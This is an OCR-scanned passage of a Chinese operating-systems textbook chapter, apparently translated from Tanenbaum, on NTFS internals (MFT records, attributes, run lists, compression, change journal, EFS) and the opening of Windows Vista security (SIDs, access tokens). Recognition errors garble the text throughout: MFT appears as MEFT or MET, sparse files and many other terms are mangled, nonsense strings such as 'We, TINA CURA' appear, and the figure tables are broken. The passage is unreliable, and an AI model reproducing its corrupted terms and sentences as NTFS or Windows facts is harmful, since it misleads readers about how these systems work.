录 3 包 含 了 卷 的 信息 ， 比 如 大 小 、 卷 标 和 版 本 。 














上 面 提 到 ， 每 个 MFT 记 录 包 含 一 个 (属性 头 ， 值 数据 对 的 序列 。 
属性 在 $AttrDef 文 件 中 定义 。 这 个 文件 的 信息 在 MFT 记 录 4 里 。 接 下 来 是 
根 目 录 ， 根 目录 本 身 是 一 个 文件 并 且 可 以 变 为 任意 长 度 。MFT 记 录 5 用 
来 描述 根 目录 。 














卷 里 的 空余 空间 通过 一 个 位 图 来 跟踪 。 这 个 位 图 本 里 是 一 个 文件 ， 
它 的 磁盘 地 址 和 属性 由 MFT 记 录 6 给 出 。 下 一 个 MFT 记 录 指 向 引 导 六 载 
程序 。 记 录 8 用 来 把 所 有 的 坏 块 链接 在 一 起 来 确保 不 会 有 文件 使 用 它 
们 。 记 录 9 包 含 安全 信息 。 记 录 10 用 于 大 小 写 映 冉 。 对 于 拉丁 字母 A-Z， 











映射 是 非常 明确 的 (至 少 是 对 说 拉丁 语 的 人 来 说 )。 对 于 其 他 语言 的 映 
射 ， 如 和 希腊 、 亚 美 尼 亚 或 乔治 亚 ， 就 对 于 讲 拉丁 语 的 人 不 太 明 确 ， 因 此 
这 个 文件 告诉 我 们 如 何 做 。 最 后 ， 记 录 11 是 一 个 目录 包含 杂项 文件 用 于 
磁盘 配额 、 对 象 标识 符 、 再 解析 点 ， 等 等 。 最 后 四 个 MET 记 录 被 留 作 将 
来 使 用 。 





每 个 MEFT 记 录 由 一 个 记录 头 和 后 面 跟 独 的 〈 属 性 头 ， 值 对 组 成 。 
记录 头 包含 一 个 约 数 用 于 有 效 性 检查 ， 一 个 序列 号 《每 次 当 记 录 被 一 个 
新 文件 再 使 用 时 束 被 更 新 〉， 文 件 引 用 记 数 ， 记 录 实 际 使 用 的 字 市 数 ， 
基本 记录 《〈 仅 用 于 扩展 记录 ) 的 标识 符 《〈 索 引 ， 序 列 号 ) ， 和 其 他 一 些 


杂项 。 





NTFS 定 义 了 13 个 属性 能 够 出 现在 MFT 记 录 中 。 图 11-42 列 出 了 这 些 
属性 。 每 个 属性 头 标识 了 属性 ， 给 出 了 长 度 ， 值 字段 的 位 置 ， 一 些 各 种 
各 样 的 标记 和 其 他 信息 。 通 常 ， 属 性 值 直接 跟 在 它们 的 属性 头 后 面 ， 但 
是 如 果 一 个 值 对 于 一 个 MFT 记 录 太 长 的 话 ， 它 可 能 被 放 在 不 同 的 磁盘 块 
中 。 这 样 的 属性 称 作 非 常 驻 属性 ， 数 据 属性 很 明显 就 是 这 样 一 个 属性 。 
一 些 属性 ， 像 名 字 ， 可 能 出 现 重复 ， 但 是 所 有 属性 必须 在 MEFT 记 录 中 按 
照 固定 顺序 出 现 。 常 驻 属 性 头 有 24 个 字 节 长 ; 非常 驻 属性 头 会 更 长 ， 因 
为 它们 包含 关于 在 磁盘 上 哪些 位 置 能 找到 这 些 属 性 的 信息 。 








标准 信息 标志 位 ， 时 间 玲 等 
Unicode 文 件 名 ， 可 能 重复 用 做 MS-DOS 格 式 名 
安全 描述 符 | 废弃 了 。 安 全 信息 现在 用 $Extend $Secure# A 
属性 列表 额外 的 MFT 记 录 的 位 置 ， 如 果 需 要 的 话 
对 此 卷 唯一 的 64 位 文件 标识 符 


FL APE DT 点 用 于 加 载 和 符号 链接 


当前 卷 的 名 字 〈 仅 用 于 $Volume) 
AA 疮 版 本 〈 仅 用 于 $Vvolume ) 
用 于 很 大 的 目录 
位 图 
日 志 工 具 流 | 控制 记录 日 志 到 $LogFile 
数据 流 ; 可 以 重复 





图 11-42 MFT 记 录 中 使 用 的 属性 


标准 的 信息 域 包含 文件 所 有 者 、 安 全 信息 、POSIX 需 要 的 时 间 惟 、 
硬 连接 计数 、 只 读 和 存档 位 ， 等 等 。 这 些 域 是 固定 长 度 的 ， 并 且 总 是 存 
在 的 。 文 件 名 是 一 个 可 变 长 度 Unicode 编 码 的 字符 捉 。 为 了 使 具有 非 MS- 
DOS 文 件 名 的 文件 可 以 访问 老 的 16 位 程序 ， 文 件 也 可 以 有 一 个 符合 8+3 
规则 的 MS-DOS 短 名 字 。 如 果实 际 文件 名 符合 8+3 命 名 规则 ， 第 二 个 MS- 
DOS 文 件 名 就 不 需要 了 。 


在 NT4.0 中 ， 安 全 信息 被 放 在 一 个 属性 中 ， 但 在 Windows 2000 及 以 








后 的 版 本 中 ， 安 全 信息 全 部 都 放 在 一 个 单独 的 文件 中 使 得 多 个 文件 可 以 
共享 相同 的 安全 描述 。 由 于 安全 信息 对 于 每 个 用 户 的 许多 文件 来 说 是 相 
同 的 ， 于 是 这 使 得 许多 MFT 记 录 和 整个 文件 系统 节省 了 大 量 的 空间 。 





当 属性 不 能 全 部 放 在 MEFT 记 录 中 时 ， 就 需要 使 用 属性 列表 。 这 个 属 
性 就 会 说 明 在 哪里 找到 扩展 记录 。 列 表 中 的 每 个 条 目 在 MFT 中 包含 一 个 
48 位 的 索引 来 说 明 扩 展 记录 在 哪里 ， 还 包含 一 个 16 位 的 序号 来 验证 扩展 
记录 与 基本 记录 是 否 匹 配 。 

















就 像 UNIX 文 件 拥 有 一 个 I 节点 号 一 样 ，NTFS 文 件 也 有 一 个 ID。 文 
件 可 以 依据 ID 被 打开 ， 但 是 由 于 ID 是 基于 MEFT 记 录 的 ， 并 且 可 以 因 该 文 
件 的 记录 移动 〈 例 如 ， 如 果 文 件 因 备份 被 恢复 ) 而 改变 ， 所 以 当 ID 必 须 
保持 不 变 时 ， 这 个 NTFS 分 配 的 ID 并 不 总 是 有 用 。NTFS 人 允许 有 一 个 可 以 
设置 在 文件 上 而 且 永远 不 需要 改变 的 独立 对 象 卫 属性 。 举 例 来 说 ， 当 一 
个 文件 被 拷贝 到 一 个 新 卷 时 ， 这 个 属性 随 着 文件 一 起 过 去 。 

















重 解析 点 告诉 分 析 文 件 名 的 过 程 来 做 特别 的 事 。 这 个 机 制 用 于 显 式 
加 载 文件 系统 和 符号 链接 。 两 个 卷 属 性 用 于 标示 卷 。 随 后 三 个 属性 处 理 
如 何 实现 目录 一 一 小 的 目录 融 是 文件 列表 ， 大 的 目录 使 用 B+ 树 实现 。 
日 志 工 具 流 属性 用 来 加 密 文件 系统 。 





最 后 ， 我 们 关注 最 重要 的 属性 ， 数据 流 《〈 在 一 些 情 况 下 叫 流 ) 。 一 
个 NTFS 文 件 有 一 个 或 多 个 数据 流 ， 这 些 就 是 负载 所 在 。 默 认 数 据 流 是 


未 命名 的 〈 例 如， 目录 路 径 \ 文 件 名 : $DATA) ， 但 是 蔡 代 数据 流 有 自 
己 的 名 字 ， 例 如 : 目录 路 径 \ 文 件 名 : MA: $DATA。 





We, TINA CURA) 会 在 属性 头 中 。 头 后 面 要 么 是 说 
明了 流 包 盒 哪 些 块 的 磁盘 地 址 列表 ， 要 么 是 仅 几 百 字 节 大 小 的 流 《 有 许 
多 这 样 的 流 ) 本 身 。 存 储 了 实际 流 数 据 的 MEFT 记 录 称 为 立即 文件 
(Mullender 和 Tanenbaum, 1984) 。 





当然 ， 大 多 数 情 况 下 ， 数 据 放 不 进 一 个 MFT 记 录 中 ， 因 此 这 个 属性 
通常 是 非常 驻 属 性 。 现 在 让 我 们 看 一 看 NTFS 如 何 记 录 特 殊 数 据 中 非常 
驻 属性 的 位 置 。 





2. 存 储 分 配 


保持 对 磁盘 中 在 可 能 的 情况 下 ， 连 续 分 配 的 块 进行 跟踪 的 模型 ， 这 
征 出 于 效率 的 原因 。 举 例 来 说 ， 如 采 一 个 流 的 第 一 个 逻辑 块 放 在 磁盘 上 
的 块 20， 那 么 系统 将 努力 把 第 二 个 逻辑 块 放 在 块 21， 第 三 个 人 逻辑 块 放 在 
块 22， 以 此 类 推 ， 实 现 这 些 行 串 的 一 个 方法 是 尽 可 能 一 次 分 配 许多 磁盘 
块 。 


一 个 流 中 的 块 是 通过 一 串 记 录 描 述 的 ， 每 个 记录 描述 了 一 串 逻 辑 上 
连续 的 块 ， 对 于 一 个 没有 和 孔 的 流 来 说 ， 只 有 唯一 的 一 个 记录 。 按 从 头 到 
尾 的 顺序 写 的 流 都 属于 这 一 类 。 对 于 一 个 包含 一 个 孔 的 流 《〈 例 如 ， 只 有 
块 0 一 49 和 块 60 一 79 被 定义 了 ) ， 会 有 两 个 记录 。 这 样 的 流 会 产生 于 先 





写 入 前 50 个 块 ， 然 后 找到 逻辑 上 第 60 块 ， 然 后 写 其 他 20 个 块 。 当 和 孔 被 读 
出 时 ， 用 全 零 表 示 。 有 和 孔 的 文件 称 为 黎 玻 文件 。 











每 个 记录 始 于 一 个 涉 ， 这 个 头 给 出 第 一 个 块 在 流 中 偏 移 量 。 接 着 是 
没有 被 记录 履 盖 的 第 一 个 块 的 偏 移 量 。 在 上 面 的 例子 中 ， 第 一 个 记录 有 
一 个 (0, 50) 的 头 ， 并 会 提供 这 50 个 块 的 磁盘 地 址 。 第 二 个 记录 有 一 
个 (60，80) 的 头 ， 会 提供 其 他 20 个 块 的 磁盘 地 址 。 





每 个 记录 的 头 后 面 跟着 一 个 或 多 个 对 ， 每 个 对 给 出 了 磁盘 地 址 和 持 
续 长 度 。 磁 盘 地 址 是 该 磁盘 块 离 本 分 区 起 点 的 偏 移 量 ， 游 程 在 行 串 中 块 
的 数量 。 在 一 段 行 串 记录 中 需要 有 多 少 对 就 可 以 有 多 少 对 。 图 11-43 撒 
述 了 用 这 种 方式 表示 的 三 段 、9 块 的 流 。 
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图 11-43 有 3 个 连续 空间 、9 个 块 的 短 流 的 一 条 MFT 记 录 


在 这 个 图 中 ， 有 一 个 9 个 块 〈 头 ，0 一 8) 的 短 流 的 MFT 记 录 。 它 由 


磁盘 上 三 个 行 串 的 连续 块 组 成 。 第 一 段 是 块 20 一 23， 第 二 段 是 块 64 一 

65， 第 三 段 是 80 一 82。 每 一 个 行 串 被 记录 在 MEFT 记 录 中 的 一 个 《磁盘 地 
址 ， 块 计数 ) 对 中 。 有 多 少 行 串 是 依赖 于 当 流 被 创建 时 磁盘 块 分 配器 在 
找 连续 块 的 行 串 时 做 的 有 多 好 。 对 于 一 个 n 块 的 流 ， 段 数 可 能 是 从 ] 到 n 

的 任意 值 。 





有 必要 在 这 里 做 几 点 说 明 : 


首先 ， 用 这 种 方法 表达 的 流 的 大 小 没有 上 限 限 制 。 在 地 址 不 压缩 的 
情况 下 ， 每 一 对 需要 两 个 64 位 数 表 示 ， 总 共 16 字 节 。 然 而 ， 一 对 能 够 表 
示 100 万 个 甚至 更 多 的 连续 的 磁盘 空间 。 实 际 上 ，20M 的 流 包含 20 个 独 
芯 的 包含 100 万 个 1KB 的 块 的 行 串 ， 每 个 都 可 以 轻易 地 放 在 一 个 MEFT 记 
录 中 ， 然 而 一 个 60KB 的 被 分 散 到 60 个 不 同 的 块 的 流 却 不 行 。 

















其 次 ， 表 示 每 一 对 的 直截了当 的 方法 会 占用 2x8 个 字 节 ， 有 压缩 方 
法 可 以 把 一 对 的 大 减 小 到 低 于 16 字 节 。 许 多 磁盘 地 址 有 多 个 高 位 0 字 
节 。 这 些 可 以 被 忽略 。 数 据 头 能 告诉 我 们 有 多 少 个 高 位 0 字 贡 被 忽略 
了 ， 也 就 是 说 ， 在 一 个 地 址 中 实际 上 有 多 少 个 字 市 个 用 。 也 可 以 用 其 他 
的 压缩 方式 。 实 际 上 ， 一 对 经 常 只 有 4 个 字 节 。 











第 一 个 例子 是 比较 容易 的 : 所 有 的 文件 信息 能 容纳 在 一 个 MFT 记 录 
中 ， 如 采 文 件 比 较 大 或 者 是 高 度 雁 片 化 以 至 于 信息 不 能 放 在 一 个 MEFT 记 
录 当 中 ， 这 时 会 发 生 什 么 呢 ? 答案 很 简单 : 用 两 个 或 更 多 的 MFT 记 录 。 











从 图 11-44 可 以 看 出 ， 一 个 文件 的 首 MFT 记 录 是 102， 对 于 一 个 MFT 记 录 
而 言 它 有 太 多 的 行囊 ， 因 而 它 会 计算 需要 多 少 个 扩展 的 MEFT 记 录 。 比 如 
说 两 个 ， 于 是 会 把 它们 的 索引 放 到 首 记 录 中 ， 首 记录 剩余 的 空间 用 来 放 


前 k 个 行 串 。 
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图 11-44 需要 三 个 MIF 记 录 存 储 其 所 有 行囊 的 文件 


注意 ， 图 11-44 包 含 了 一 些 多 余 的 信息 。 理 论 上 不 需要 指出 一 串 行 
串 的 结尾 ， 因 为 这 些 信 息 可 以 从 行 串 对 中 计算 出 来 。 列 出 这 些 信息 是 为 
了 更 有 效 地 搜索 : 找到 在 一 个 给 定 文件 偏 移 量 的 块 ， 只 需要 去 检查 记录 
头 ， 而 不 是 行 串 对 。 








当 MEFT 记 录 102 中 所 有 的 空间 被 用 完 后 ， 剩 余 的 行 串 继续 在 MEFT 记 
录 105 中 存放 ， 并 在 这 个 记录 中 放 入 尽 可 能 多 的 项 。 当 这 个 记录 也 用 完 
后 ， 剩 下 的 行 串 放 在 MET 记 录 108 中 。 这 种 方式 可 以 用 多 个 MET 记 录 去 





处 理 大 的 分 段 存储 文件 。 


有 可 能 会 出 现 这 样 的 问题 ， 如 果 文 件 需 要 的 MFT 记 录 太 多 ， 以 至 于 
首 个 MTF 记 录 中 没有 足够 的 空间 去 存放 所 有 的 索引 。 解 决 这 个 问题 的 方 
法 是 : 使 扩展 的 MEFT 记 录 列 表 成 为 非 驻 留 的 〈 即 : 存放 在 其 他 的 硬盘 区 
域 而 不 是 在 首 MFT 记 录 中 ) ， 这 样 它 就 能 根据 需要 而 增 大 。 


图 11-45 表 示 一 个 MFT 表 项 如 何 描述 一 个 小 目录 。 这 个 记录 包含 各 
干 目录 项 ， 每 一 个 目录 项 可 以 描述 一 个 文件 或 目录 。 每 个 表 项 包含 一 个 
定 长 的 结构 体 和 紧 随 其 后 的 不 定 长 的 文件 名 。 定 长 结构 体 包含 该 文件 对 
应 的 MFT 表 项 的 索引 、 文 件 名 长 度 以 及 其 他 的 属性 和 标志 。 在 目录 中 查 
找 一 个 目录 项 需要 依次 检查 所 有 的 文件 名 。 











目录 项 包含 该 文件 对 应 的 MFT 表 项 的 索引 、 文 
标准 信息 头 索引 根 头 件 名 长 度 、 文 件 名 本 身 以 及 其 他 的 字段 和 标志 





图 11-45 描述 小 目录 的 MFT 记 录 


大 目录 采用 一 种 不 同 的 格式 ， 即 用 B+ 树 而 不 是 线性 结构 来 列 出 文 
件 。 通 过 B+ 树 可 以 按照 字母 顺序 碍 找 文件 ， 并 且 更 容易 在 目录 的 正确 
位 置 插 入 新 的 文件 名 。 





现在 有 足够 的 信息 去 描述 使 用 文件 名 对 文件 \??\C:oobar 的 查找 是 
如 何 进行 的 。 从 图 11-22 可 以 知道 Win32、 原 生 NT 系 统 调用 、 对 象 和 IO 
管理 右 如 何 协作 通过 向 C 检 的 NTFS 设 备 栈 (device stack) 发 送 MO 请 求 
打开 一 个 文件 。IO 请 求 要 求 NTFS 为 剩余 的 路 径 名 \foovbar 盾 写 一 个 文件 
对 象 。 


NTFS 从 C 盘 根 目 录 开 始 分 析 \foo\bar 路 径 ，C 盘 的 块 可 以 在 MEFT 中 的 
第 五 个 表 项 中 找到 (参考 图 11-41) 。 然 后 在 根 目 录 中 查找 字符 
串 “foo”， 返 回 目 录 foo 在 MEFT 中 的 索引 ， 接 着 再 查找 字符 串 “bar”， 得 到 
这 个 文件 的 MFT 记 录 的 引用 。NTFS 通 过 调用 安全 引用 管理 器 来 实施 访 
问 检 查 ， 如 果 所 有 的 检查 都 通过 了 ，NTFS 从 MFT 记 录 中 搜索 得 
到 ::$DATA 属 性 ， 即 默认 的 数据 流 。 








找到 文件 bar 后 ，NTFS 在 IO 管理 器 返回 的 文件 对 象 上 设置 指针 指向 
它 自己 的 元 数据 。 元 数据 包括 指向 MFT 记 录 的 指针 、 压 缩 和 范围 锁 、 各 
种 关于 共享 的 细节 等 。 大 多 数 元 数据 包含 在 一 些 数据 结构 中 ， 这 些 数据 
结构 被 所 有 引用 这 个 文件 的 文件 对 象 共 享 。 有 一 些 域 是 当前 打开 的 文件 
特有 的 ， 比 如 当 这 个 文件 被 关闭 时 是 否 需要 删除 。 一 旦 文件 成 功 打开 ， 
NTFS 调 用 IoCompleteRequest， 它 通过 把 IPR 沿 1O 栈 向 上 传递 给 WO 和 对 
象 管理 费 。 最 终 ， 这 个 文件 对 象 的 句柄 个 放 进 当前 进程 的 句柄 表 中 ， 然 
后 回 到 用 户 态 。 之 后 调用 ReadFile 时 ， 应 用 程序 能 够 提供 句柄 ， 该 句柄 
表明 C:\foovbar 文 件 对 象 应 该 包含 在 传递 到 C: 设备 栈 给 NTFS 的 读 请 求 

















除了 支持 普通 文件 和 目录 外 ，NTEFS 支 持 像 UNIX 那 样 的 硬 连接 ， 也 
通过 一 个 叫做 重 解析 点 的 机 制 文 持 符 扎 链接 。NTEFS 文 持 把 一 个 文件 或 
者 目录 标记 为 一 个 重 解析 点 ， 并 将 其 和 一 块 数据 关联 起 来 。 当 在 文件 名 
解析 的 过 程 中 遇 到 这 个 文件 或 目录 时 ， 操 作 就 会 失败 ， 这 块 数据 被 返回 
到 对 象 管理 器 。 对 象 管理 器 将 这 甘 数 据 解释 为 妃 一 个 路 径 名 ， 然 后 更 新 
再 要 解析 的 字符 串 ， 并 重 司 IO 操作 。 这 种 机 制 用 来 文 持 符号 链接 和 挂 
载 文件 系统 ， 把 文件 搜索 重 定 同 到 目录 层次 结构 的 妃 外 一 个 部 分 甚至 到 
另外 一 个 不 同 的 分 区 。 











重 解析 点 也 用 来 为 文件 系统 过 滤器 驱动 程序 而 标记 个 别 文件 。 在 图 
11-22 中 显示 了 文件 系统 过 滤器 如 何 安装 到 MO 管理 器 和 文件 系统 之 间 。 
IO 请 求 通 过 调用 IoCompleteRequest 来 完成 ， 其 把 控制 权 转 交 给 在 请 求 
发 起 时 设备 栈 上 每 个 驱动 程序 插入 到 IRP 中 的 完成 例 程 。 需 要 标记 一 个 
文件 的 驱动 程序 首先 关联 一 个 重 解析 标签 ， 然 后 监控 由 于 遇 到 重 解析 点 
而 失败 的 打开 文件 操作 的 完成 请 求 。 通 过 用 IRP 传 回 的 数据 块 ， 驱 动 程 
序 可 以 判断 出 这 是 否 是 一 个 驱动 程序 自身 关联 到 该 文件 的 数据 块 。 如 果 
是 ， 驱 动 程序 将 停止 处 理 完成 例 程 而 接着 处 理 原 来 的 VO 请 求 。 通 常 这 
将 引发 一 个 打开 请 求 ， 但 这 时 将 有 一 个 标志 告诉 NTFS 忽 略 重 解析 点 并 
同时 打开 文件 。 














3. 文 件 压缩 


NTEFS 文 持 透明 的 文件 压 纵 。 一 个 文件 能 够 以 压缩 方式 创建 ， 这 意 
味 着 当 向 磁盘 中 写 入 数据 块 时 NTFS 会 自动 党 试 去 压缩 这 些 数 据 块 ， 当 
这 些 数 据 块 被 读 取 时 NTFS 会 目 动 解压 。 访 或 写 的 进程 完全 不 知道 压缩 
和 解压 在 进行 。 





压缩 流程 是 这 样 的 : 当 NTFS 写 一 个 有 压缩 标志 的 文件 到 磁盘 时 ， 
它 检 查 这 个 文件 的 前 16 个 逻辑 块 ， 而 不 省 它们 占用 多 少 个 项 ， 然 后 对 它 
们 运行 压缩 算法 ， 如 果 压 缩 后 的 数据 能 够 存放 在 15 个 其 至 更 少 的 块 中 ， 
压缩 数据 将 写 到 硬盘 中 ; 如果 可 能 的 话 ， 这 些 块 在 一 个 行 串 里 。 如 果 压 
缩 后 的 数据 仍然 占用 16 个 块 ， 这 16 个 块 以 不 压缩 方式 写 到 硬盘 中 。 之 
后 ， 去 检查 第 16-31 块 看 是 否 能 压缩 到 15 个 其 全 更 少 的 块 ， 以 此 类 推 。 


图 11-46a 显 示 一 个 文件 。 该 文件 的 前 16 块 被 成 功 地 压 盎 到 了 8 个 ， 
对 第 二 个 16 块 的 压缩 没有 成 功 ， 第 三 个 16 块 也 压缩 了 50%。 这 三 个 部 分 
作为 三 个 行 串 来 写 ， 并 存储 于 MET 记 录 中 。“ 丢 失 ” 的 块 用 磁盘 地 址 0 存 
放 在 MET 表 项 中 ， 如 图 11-46b 所 示 。 在 图 中 ， 头 〈0，48) 后 面 有 五 个 
二 元 组 ， 其 中 ， 两 个 对 应 着 第 一 个 (被 压缩 》 行 串 ， 一 个 对 应 没有 压缩 
的 行 串 ， 两 个 对 应 最 后 一 个 (被 压缩 ) 行 串 。 


压缩 前 的 文件 





a) 
头 文件 5 个 块 串 〈 其 中 有 两 个 为 空 ) 
一人 一 人 一 人 一 一 人 一 一 人 一 天 -人 一 
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图 11-46 一 个 占 48 块 的 文件 被 压缩 到 32 块 的 例子 ; b) 被 压缩 后 文件 
对 应 的 MFT 记 录 








当 读 文件 时 ，NTEFS 需 要 分 辨 永 个 行 哩 是 否 被 压缩 过 ， 它 可 以 根据 
磁盘 地 址 进行 分 辨 如 果 其 磁盘 地 址 是 0， 表 明 它 是 16 个 被 压缩 的 块 的 
最 后 部 分 。 为 了 避免 混 消 ， 磁 盘 第 0 块 不 用 于 存储 数据 。 同 时 ， 因 为 卷 
上 的 第 0 块 包含 了 引导 忆 区 ， 用 它 来 存储 数据 也 是 不 可 能 的 。 





随机 访问 压缩 文件 也 是 可 行 的 ， 但 是 需要 技巧 。 假 设 一 个 进程 寻找 
图 11-46 中 文件 的 第 35 块 ，NTFS 是 如 何 定 位 一 个 压缩 文件 的 第 35 块 区 的 
呢 ? 答案 是 NTFS 必 须 首先 读 取 并 且 解 压 整 个 行 串 ， 获 得 第 35 块 的 位 
置 ， 之 后 就 可 以 将 该 块 传 给 读 取 它 的 进程 。 选 择 16 个 块 作为 压缩 单元 是 
一 个 折 囊 的 结果 ， 短 了 会 影响 压缩 效率 ， 长 了 则 会 使 随机 访问 开销 过 
Be 





外加 二 


NTFS 支 持 两 种 让 程序 探测 卷 上 文件 和 目录 变化 的 机 制 。 第 一 种 机 
制 是 调用 名 为 NtNotifyChange Directory File 的 WO 操作 ， 传 递 一 个 缓冲 区 
给 系统 ， 当 系统 探测 到 目录 或 者 子 目 录 树 变化 时 ， 该 操作 返回 。 这 个 
IO 操作 的 结果 是 在 缓冲 区 里 填 上 变化 记录 的 一 个 列表 。 绥 冲 区 应 该 足 
够 大 ， 和 否则 填 不 下 的 记录 会 被 丢弃 。 














第 二 种 机 制 是 NTFS 变 化 日 志 。NTEFS 将 卷 上 的 目录 和 文件 的 变化 记 
录 保 存 到 一 个 特殊 文件 中 ， 程 序 可 以 使 用 特殊 文件 系统 控制 操作 来 读 
取 ， 即 调用 API NtFsControlFile 并 以 FSCTL_QUERY_USN_ JOURNAL 为 
参数 。 日 志文 件 通常 很 大 ， 而 且 日 志 中 的 项 在 被 检查 之 前 重用 的 可 能 性 


En 
5. 文 件 加 密 


如 今 ， 计 算 机 用 来 存储 很 多 敏感 数据 ， 包 括 公 司 收购 计划 、 税 务 信 
恩 、 情 书 ， 数 据 的 所 有 者 不 想 把 这 些 信 息 暴 露 给 任何 人 。 但 是 信息 的 泄 
漏 是 有 可 能 发 生 的 ， 例 如 笔记 本 电脑 的 丢失 或 失 贸 ;使 用 MS-DOS 软 盘 
重 起 蝎 面 系统 来 比 过 Windows 的 安全 保护 ;或 者 将 硬盘 从 计算 机 里 移 到 
为 一 台 安 装 了 不 安全 操作 系统 的 计算 机 中 。 


Windows 提 供 了 加 密 文件 的 选项 来 解决 这 些 问题 ， 因 此 当 电 脑 的 失 
锁 或 用 MS-DOS 草 局 时 ， 文 件 内 容 古 不 可 读 的 。Windows 加 和 密 的 通常 方 





式 是 将 重要 目录 标识 为 加 密 的 ， 然 后 目录 里 的 所 有 文件 都 会 被 加 密 ， 新 
创建 或 移动 到 这 些 目录 来 的 文件 也 会 被 加 密 。 加 密 和 解密 不 是 NTFS 自 
己 管理 的 ， 而 是 由 EFS (Encryption File System) 驱动 程序 来 管理 ，EFS 
作为 回调 向 NTFS 注 册 。 


EFS 为 特殊 文件 和 目录 提供 加 密 。 在 Windows Vista 中 还 有 另外 一 个 
叫做 BitLocker 的 加 密 工 具 ， 它 加 密 了 卷 上 几乎 所 有 的 数据 。 只 要 用 户 使 
用 强 密 钥 来 发 挥 这 种 机 制 的 优势 ， 任 何 情况 下 它 都 能 帮助 用 户 保护 数 
据 。 考 虑 到 系统 于 失 或 失 镭 的 数量 ， 以 及 号 份 泄露 的 强烈 敏感 性 ， 确 保 
机 密 被 保护 是 非常 重要 的 。 每 天 都 有 惊人 数量 的 笔记 本 电脑 丢失 ; NA 
虑 纽约 市 ， 华 尔 街 大 部 分 公司 平均 一 周 在 出 租车 上 丢失 一 台 笔 记 本 电 


脑 。 








11.9 Windows Vista 中 的 安全 








看 过 加 密 后 ， 该 从 总 体 上 探讨 安全 问题 了 。NT 的 最 初 设计 符合 
国 国防 部 C2 级 安全 需求 (DoD 5200.28-STD) ， 该 橘 皮 书 是 安全 的 DoD 
系统 必需 满足 的 标准 。 此 标准 要 求 操 作 系统 必 需 具 备 某 些 特性 才能 认定 
对 特定 类 型 的 军事 工作 是 足够 安全 的 。 虽 然 wWindows Vista 并 不 是 专 为 满 
足 C2 兼 容 性 而 设计 的 ， 但 它 从 最 初 的 NT 安全 设计 中 继承 了 很 多 安全 特 
性 ， 包 括 下 面 的 几 个 : 





1) 具 有 反 欺 骗 措施 的 安全 登录 。 
2) 自 主 访问 控制 。 

3) 特 权 化 访问 控制 。 

4) 对 每 个 进程 的 地 址 空间 保护 。 
5) 新 页 被 映射 前 必需 清空 。 

6) 安 全 审计 。 


让 我 们 来 简要 地 回顾 一 下 这 些 条 目 。 





安全 登录 意味 着 系统 管理 员 可 以 要 求 所 有 用 户 必需 拥有 密码 才 可 以 
登录 。 坎 骗 是 指 一 个 恶意 用 户 编写 了 一 个 在 屏幕 上 显示 登录 提示 的 程序 














然后 走 开 以 期 望 一 个 无 境 的 用 户 会 坐 下 来 并 输入 用 户 名 和 密码 。 用 户 名 
和 密码 被 写 到 磁盘 中 并 且 用 户 被 告知 登陆 失败 。Windows Vista 通 过 指示 
用 户 按 下 CTRL-ALT-DEL 登 录 来 避免 这 样 的 攻击 。 键 盘 驱 动 总 是 可 以 捕 
获 这 个 键 序列 ， 并 随后 调用 一 个 系统 程序 来 显示 真正 的 登录 屏幕 。 这 个 
过 程 可 以 起 作用 是 因为 用 户 进程 无 法 禁止 键盘 驱动 对 CTRL-ALT-DEL 的 
处 理 。 但 是 NT 可 以 并 且 确 实在 某 些 情 况 下 禁用 了 CTRL-ALT-DEL 安 全 
警告 序列 。 这 种 想法 来 自 于 Windows XP 和 Windows 2000， 用 来 使 NT 系 
统 对 从 Windows 98 切 换 过 来 的 用 户 保持 更 多 的 兼容 性 。 





自主 访问 控制 允许 文件 或 者 其 他 对 象 的 所 有 者 指定 谁 能 以 何 种 方式 
使 用 它 。 特 权 化 访问 控制 允许 系统 管理 员 〈 超 级 用 户 ) 随 需 禾 盖 上 述 权 
限 设 定 。 地 址 空间 保护 仅仅 意味 着 每 个 进程 目 己 的 受 保护 的 虚拟 地 址 空 
间 不 能 被 其 他 未 授权 的 进程 访问 。 下 一 个 条 目 意味 着 当 进 程 的 堆 增长 时 
被 映射 进来 的 页 面 被 初始 化 为 零 ， 这 样 它 就 找 不 到 页 面 以 前 的 所 有 者 所 
存放 的 旧 信 息 《〈《 参 见 在 图 11-36 中 为 此 目的 而 提供 的 清 零 页 的 列表 ) 。 
最 后 ， 安 全 审计 使 得 管理 员 可 以 获取 攻 些 安全 相关 事件 的 日 志 。 

















橘 皮 书 没 有 指定 当 笔 记 本 电脑 被 盗 时 将 发 生 什么 事情 ， 然 而 在 一 个 
大 型 组 织 中 每 星期 发 生 一 起 盗 锅 是 很 常见 的 。 于 是 ，Windows Vista 提 供 
了 一 些 工具 ， 当 笔记 本 被 盗 或 者 丢失 时 ， 谨 慎 的 用 户 可 以 利用 它们 最 小 
化 损失 。 当 然 ， 谨 慎 的 用 户 正 是 那些 不 会 丢失 笔记 本 的 人 一 一 这 种 麻烦 
是 其 他 人 引起 的 。 





下 一 章 将 描述 在 Windows Vista 中 基本 的 安全 概念 ， 以 及 关于 安全 的 
系统 调用 。 最 后 ， 我 们 将 看 看 安全 是 怎样 实现 的 。 








11.91 基本 概念 


每 个 Windows Vista 用 户 〈 和 组 ) 用 一 个 SID (Security ID， 安 全 
ID) 来 标识 。SID 是 二 进 制 数字 ， 由 一 个 短 的 头 部 后 面 接 一 个 长 的 随机 
部 分 构成 。 每 个 SID 都 是 世界 范围 内 唯一 的 。 当 用 户 局 动 进程 时 ， 进 程 
和 它 的 线程 带 有 该 用 户 的 SID 运 行 。 安 全 系统 中 的 大 部 分 地 方 被 设计 为 
确保 只 有 带 有 授权 SID 的 线程 才 可 以 访问 对 象 。 





每 个 进程 拥有 一 个 指定 了 SID 和 其 他 属性 的 访问 令 牌 。 该 令 牌 通常 
由 winlogon 创 建 ， 就 像 后 面 说 的 那样 。 图 11-47 展 示 了 令 牌 的 格式 。 进 程 
可 以 调用 GetTokenInformation 来 获取 令 牌 信息 。 令 牌 的 头 部 包含 了 一 些 
管理 性 的 信息 。 过 期 时 间 字 段 表示 令 牌 何 时 不 再 有 效 ， 但 当前 并 没有 使 
用 该 字段 。 组 字段 指定 了 进程 所 隶属 的 组 。POSIX 子 系统 需要 该 字段 。 
默认 的 DACL (Discretionary Access Control List， 自 主 访问 控制 列表 ) 
会 赋 给 被 进程 创建 的 对 象 ， 如 果 没 有 指定 其 他 ACL 的 话 。 用 户 的 SID 表 
示 进 程 的 拥有 者 。 受 限 SID 使 得 不 可 信 的 进程 以 较 少 的 权限 参与 到 可 信 
进程 的 工作 中 ， 以 免 造 成 破坏 。 








图 11-47 访问 令 牌 结构 


最 后 ， 权 限 字 段 ， 如 果 有 的 话 ， 赋 予 进程 除 普 通用 户外 特殊 的 权 
